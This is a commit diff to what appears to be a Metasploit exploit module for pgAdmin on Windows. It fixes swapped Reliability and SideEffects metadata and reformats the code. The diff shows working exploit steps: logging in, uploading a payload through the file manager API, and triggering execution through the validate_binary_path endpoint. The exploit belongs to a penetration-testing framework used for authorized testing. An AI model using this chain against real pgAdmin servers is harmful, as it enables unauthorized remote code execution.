Fixing wrong SideEffects and Reliability values

igomeow · igomeow · commit 2b7cf76fc85d · 2024-08-28T18:20:20.000+02:00
diff --git a/modules/exploits/windows/http/pgadmin_binary_path_api.rb b/modules/exploits/windows/http/pgadmin_binary_path_api.rb
@@ -44,8 +44,8 @@ def initialize(info = {})
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ],
-          'SideEffects' => [ REPEATABLE_SESSION, ]
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
         }
       )
     )
@@ -96,8 +96,9 @@ def auth_required?
 
   def on_windows?
     res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
-    if res&.code == 200 && platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first
-      return platform == 'win32' ? true : false
+    if res&.code == 200
+      platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first
+      return platform == 'win32'
     end
   end
 
@@ -139,17 +140,17 @@ def exploit
 
     if auth_required?
       res = send_request_cgi({
-                               'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
-                               'method' => 'POST',
-                               'keep_cookies' => true,
-                               'vars_post' => {
-                                 'csrf_token' => csrf_token,
-                                 'email' => datastore['USERNAME'],
-                                 'password' => datastore['PASSWORD'],
-                                 'language' => 'en',
-                                 'internal_button' => 'Login'
-                               }
-                             })
+        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'vars_post' => {
+          'csrf_token' => csrf_token,
+          'email' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'language' => 'en',
+          'internal_button' => 'Login'
+        }
+      })
 
       unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')
         fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')
@@ -171,17 +172,17 @@ def exploit
 
   def file_manager_init
     res = send_request_cgi({
-                             'uri' => normalize_uri(target_uri.path, 'file_manager/init'),
-                             'method' => 'POST',
-                             'keep_cookies' => true,
-                             'ctype' => 'application/json',
-                             'headers' => { 'X-pgA-CSRFToken' => csrf_token },
-                             'data' => {
-                               'dialog_type' => 'storage_dialog',
-                               'supported_types' => ['sql', 'csv', 'json', '*'],
-                               'dialog_title' => 'Storage Manager'
-                             }.to_json
-                           })
+      'uri' => normalize_uri(target_uri.path, 'file_manager/init'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => {
+        'dialog_type' => 'storage_dialog',
+        'supported_types' => ['sql', 'csv', 'json', '*'],
+        'dialog_title' => 'Storage Manager'
+      }.to_json
+    })
 
     unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))
       fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')
@@ -205,13 +206,13 @@ def file_manager_upload_and_trigger(file_path, file_contents)
     form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')
 
     res = send_request_cgi({
-                             'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),
-                             'method' => 'POST',
-                             'keep_cookies' => true,
-                             'ctype' => "multipart/form-data; boundary=#{form.bound}",
-                             'headers' => { 'X-pgA-CSRFToken' => csrf_token },
-                             'data' => form.to_s
-                           })
+      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form.bound}",
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => form.to_s
+    })
     unless res&.code == 200 && res.get_json_document['success'] == 1
       fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')
     end
@@ -221,15 +222,15 @@ def file_manager_upload_and_trigger(file_path, file_contents)
     print_status("Payload uploaded to: #{upload_path}")
 
     send_request_cgi({
-                       'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),
-                       'method' => 'POST',
-                       'keep_cookies' => true,
-                       'ctype' => 'application/json',
-                       'headers' => { 'X-pgA-CSRFToken' => csrf_token },
-                       'data' => {
-                         'utility_path' => upload_path[0..upload_path.size - 16]
-                       }.to_json
-                     })
+      'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => {
+        'utility_path' => upload_path[0..upload_path.size - 16]
+      }.to_json
+    })
 
     true
   end
